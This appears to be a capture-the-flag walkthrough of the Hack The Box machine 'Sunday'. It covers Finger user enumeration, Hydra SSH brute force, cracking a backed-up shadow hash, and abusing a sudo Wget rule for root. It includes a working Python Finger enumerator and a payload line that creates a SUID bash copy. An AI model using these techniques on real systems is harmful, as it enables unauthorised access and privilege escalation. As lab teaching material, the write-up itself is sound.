Hack The Box – Sunday Walkthrough
Introduction
This was an easy Solaris machine that required enumerating users through the Finger service to identify the sunny user, bruteforcing that user's SSH password with Hydra, cracking a password hash found in a backup copy of /etc/shadow to escalate to the sammy user, and abusing a sudo rule that lets Wget run as root to escalate privileges to root.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
From the initial scan, it can be identified that the Finger service (TCP port 79) is available. Finger is an old protocol that returns information about users on a remote host, including whether a given login name exists, which makes it useful for username enumeration. Performing another Nmap scan using the -p- flag to probe all 65535 TCP ports:
This second scan identifies port 22022 as open, which upon further inspection of the -sV output shows that it is being used by SSH.
Enumerating Finger
Starting msfconsole, searching for modules related to Finger and selecting the auxiliary/scanner/finger/finger_users module. Setting RHOSTS to the target system and the user wordlist (USERS_FILE) to the names.txt wordlist that comes with SecLists, then running the module:
The finger_users module found a “sunny” user, which can now be used to bruteforce SSH credentials on port 22022.
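As an added example (not code from the original walkthrough or from Metasploit), the following Python Finger client does what the finger_users module does in principle: it sends each candidate name as an RFC 1288 query and decides from the reply whether the account exists. The rule that Solaris finger prints "???" in the Name column for an unknown login, the canned sample replies, and the host 203.0.113.10 are all assumptions made for the example.

```python
"""Finger user enumeration (RFC 1288) over raw sockets.

Added example, not code from the original walkthrough. It does what the
Metasploit finger_users module does in principle: send each candidate name
as a query and decide from the reply whether the account exists. The
classification rule is an assumption about Solaris finger output, which
prints "???" in the Name column for a login it does not know.
"""
import socket

FINGER_PORT = 79


def finger_query(host, user, port=FINGER_PORT, timeout=5.0):
    """Send one RFC 1288 query ("<user>\\r\\n") and return the raw reply text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode("ascii", "ignore"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


def parse_finger_reply(reply):
    """Return the login names a tabular finger reply confirms as existing.

    Assumed layout: a header line starting with "Login", then one line per
    account with the login in column 1 and the Name in column 2. A "???"
    in the Name column (Solaris behaviour, assumed here) means no such user.
    Replies without that header ("No one logged on", error text) yield nothing.
    """
    found = set()
    lines = reply.splitlines()
    if not lines or not lines[0].lstrip().startswith("Login"):
        return found
    for line in lines[1:]:
        fields = line.split()
        if len(fields) >= 2 and fields[1] != "???":
            found.add(fields[0])
    return found


def enumerate_users(host, candidates, port=FINGER_PORT, query=finger_query):
    """Query every candidate and return the sorted list of confirmed logins.

    `query` is injectable so the logic can run offline against canned replies.
    A connection error on one name (server dropping us, timeout) skips that
    name instead of aborting the whole run.
    """
    confirmed = set()
    for name in candidates:
        try:
            confirmed |= parse_finger_reply(query(host, name, port))
        except OSError:
            continue
    return sorted(confirmed)


# Constructed sample replies, shaped like Solaris finger output; these were
# not captured from the real machine.
HEADER = "Login       Name               TTY         Idle    When    Where\n"
SAMPLE_REPLIES = {
    "sunny": HEADER + "sunny    sunny                 pts/2          <Apr 24 10:01> 10.10.14.5\n",
    "root":  HEADER + "root     Super-User            console        <Apr 24 09:00>\n",
    "admin": HEADER + "admin            ???\n",
    "":      "No one logged on\n",
}


def fake_query(host, user, port=FINGER_PORT):
    """Offline stand-in for finger_query() returning the canned replies above."""
    return SAMPLE_REPLIES.get(user, HEADER + f"{user}            ???\n")


if __name__ == "__main__":
    # Offline demonstration; swap fake_query for finger_query to hit a live host.
    names = ["admin", "sunny", "bob", "root"]
    print(enumerate_users("203.0.113.10", names, query=fake_query))  # ['root', 'sunny']
```

Against a live target, pass finger_query instead of fake_query and feed it the same SecLists names list one entry per line; the parser deliberately treats anything without the tabular header as "no user" so a daemon that answers with an error string does not produce false positives.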
Bruteforcing SSH Credentials
Using Hydra to bruteforce the password for that user, with the following flags:
- -f to stop the attack when a valid password is found
- -s to specify the port to target for the bruteforce attack
- -l to specify the username for the bruteforce attack
- -P to specify the wordlist to use for the bruteforce attack
- the service and target to bruteforce, in the form ssh://<target>
Hydra reports the password for sunny as “sunday”. Authenticating to the target over SSH on port 22022 as the “sunny” user:
Privilege Escalation
Looking through common files and directories, a “backup” folder is found in the root of the filesystem:
The backup directory contains a backup of the /etc/shadow file, in which a password hash for the “sammy” user can be found:
Adding the hash to a text file and cracking it with John the Ripper, using the following flags:
- --wordlist to specify the wordlist to use, in this case rockyou
- the text file containing the hashes, one per line
John recovers the password for the sammy user as “Cooldude!”. Using the su command to switch to the sammy user, then running sudo -l to see which commands the current user can execute as root shows that it can run Wget:
This can be abused because sudo runs Wget as root, so whatever Wget writes is written with root's privileges: a new file is created owned by root, and an existing file, such as a script or binary that root already executes, can be overwritten in place with the content of the URL while keeping its existing ownership and mode bits. Wget itself only writes the file; for the downloaded script to produce a root-owned SUID shell, it still has to be executed as root. Creating a script that will generate a SUID copy of the /bin/bash binary on the local Kali host:
Downloading the file remotely using Wget, specifying the URL and file to save it as:
Executing the script:
The new SUID bash binary is executed with the -p flag, which tells bash not to drop its effective UID back to the real UID at startup (without -p a SUID bash silently reverts to the calling user's privileges), and this grants a root shell on the host:
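As an added example, not code from the original walkthrough, the following Python reproduces the file-writing behaviour a root-run `wget -O <path>` relies on, without wget, sudo or a network. It assumes wget opens its output with a plain truncate-and-write (`fopen(path, "wb")` in wget's source); the payload script and the temporary paths are constructed for the example. It shows the two consequences that matter for the sudo rule on this box: an existing file keeps its mode bits when overwritten, while a freshly created file only gets 0666 & ~umask, which is never SUID and normally not executable.

```python
"""What a root-run `wget -O <path>` can and cannot do to file permissions.

Added example, not from the original walkthrough. wget writes its output by
truncating and rewriting the target (assumed here to match fopen(path, "wb")
in wget's source), so the same open mode is reproduced below without wget,
sudo or a network.
"""
import os
import stat
import tempfile

# Constructed payload: the kind of script the walkthrough downloads.
PAYLOAD = b"#!/bin/sh\ncp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash\n"


def write_like_wget(path, data):
    """Truncate-and-write `data` to `path` and return the resulting mode bits."""
    with open(path, "wb") as fh:
        fh.write(data)
    return stat.S_IMODE(os.stat(path).st_mode)


def overwrite_keeps_mode(mode=0o755):
    """Overwriting an existing executable in place leaves its mode untouched.

    This is why pointing a root-run wget at a script that root already
    executes is useful: the content changes, the permissions do not.
    (Linux strips SUID/SGID bits when an unprivileged user writes to a file,
    so the demonstration uses plain 0755; written as root via sudo, even
    4755 survives.)
    """
    workdir = tempfile.mkdtemp()
    target = os.path.join(workdir, "existing.sh")
    with open(target, "wb") as fh:
        fh.write(b"#!/bin/sh\necho original\n")
    os.chmod(target, mode)
    return write_like_wget(target, PAYLOAD) == mode


def new_file_gets_umask_mode(umask=0o022):
    """A freshly created download is 0666 & ~umask: no exec bit, never SUID.

    Downloading the SUID-creating script to a new path therefore yields a
    root-owned file that nobody runs as root; something root executes still
    has to run it before /tmp/rootbash exists.
    """
    workdir = tempfile.mkdtemp()
    target = os.path.join(workdir, "fresh.sh")
    previous = os.umask(umask)
    try:
        mode = write_like_wget(target, PAYLOAD)
    finally:
        os.umask(previous)
    return mode == (0o666 & ~umask) and not (mode & (stat.S_ISUID | stat.S_IXUSR))


if __name__ == "__main__":
    print("existing file keeps mode:", overwrite_keeps_mode())      # True
    print("new file gets umask mode:", new_file_gets_umask_mode())  # True
```

The practical check before relying on the sudo rule is therefore `ls -l` on the intended destination: if the path already exists with execute (or SUID) bits and is something root runs, overwriting it with `sudo wget -O` keeps those bits; a new path gives a plain data file.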